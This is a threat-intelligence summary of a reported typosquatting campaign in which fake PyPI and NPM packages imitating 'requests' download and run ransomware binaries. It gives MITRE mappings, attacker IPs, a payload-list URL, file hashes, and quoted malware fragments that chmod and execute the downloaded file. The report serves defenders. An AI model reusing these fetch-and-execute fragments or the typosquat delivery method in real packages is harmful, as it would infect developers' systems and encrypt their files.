Threat Research

Phylum Detects Ongoing Typosquat/Ransomware Campaign in PyPI and NPM

Securonix

Phylum reports an ongoing typosquatting campaign targeting Python and JavaScript developers on PyPI and NPM, delivering a ransomware payload when executed. The attacker publishes typosquatted packages (notably around the Python requests package) that fetch a list of remote binaries and attempt to encrypt files on affected systems. #PyPI #NPM

Keypoints

  • Typosquatted PyPI/NPM packages mimic legitimate software (e.g., the Python requests package) to deliver malicious payloads.
  • The malicious packages fetch a list of available binaries from a remote host (http://35.235.126.33/all.txt) to determine which payload to download.
  • Depending on the victim OS, one of many Golang binaries (cia.*) is downloaded and executed, with architecture-specific variants for Linux, Windows, and macOS.
  • The malware uses OS commands (chmod and execution) to run the downloaded binaries, with Windows using a start command to launch payloads.
  • The ransomware component will update the desktop background and attempt to encrypt files, with a README showing a $100 ransom demand in multiple currencies.
  • VirusTotal marks the binaries as malware and lists multiple SHA-1 hashes for the payloads.
  • The campaign also expanded to NPM with JavaScript equivalents of the Python payload, and the attacker continued updates through Dec 13, 2022, pulling second-stage payloads from another host (34.94.72.179) and releasing new builds.

MITRE Techniques

  • [T1195] Supply Chain – Typosquatting PyPI/NPM packages to deliver payloads. β€œOvernight we saw a flurry of activity around typosquats of the popular Python requests package.”
  • [T1105] Ingress Tool Transfer – Downloading payloads from a remote host after an initial fetch. β€œThe initial request reaches out to the following host to fetch a list of available binaries.”
  • [T1059] Command and Scripting Interpreter – Executing downloaded binaries via OS commands (Linux/macOS chmod and execution, Windows start). β€œos.system(f’chmod +x {executable}’)” and β€œos.system(f’./{executable} &’)”
  • [T1486] Data Encrypted for Impact – The ransomware encrypts files on the victim machine and shows a ransom note. β€œThis binary is ransomware. If you execute it on a machine it will update your desktop background and attempt to encrypt some of your files.”
  • [T1071.001] Web Protocols – C2/payload delivery and second-stage fetch occur over HTTP. β€œThe initial request reaches out to the following host to fetch a list of available binaries.”

Indicators of Compromise

  • [IP] – 35.235.126.33 (initial payload fetch host) and 34.94.72.179 (second-stage host)
  • [URL] – http://35.235.126.33/all.txt (initial list of binaries to download)
  • [SHA1] – 4e5455caf9e5499e82b8ae6ecfdb69556dd780d8 – Linux PPC64LE binary (and 2 more hashes)
  • [SHA1] – 85b35a6b5901283d7f4b52061ff51664f3577aef – Windows ARM executable (and 2 more hashes)
  • [File Name] – cia.linux.amd64, cia.windows.amd64.exe (and 2 more hashes)

Read more: https://blog.phylum.io/phylum-detects-active-typosquatting-campaign-in-pypi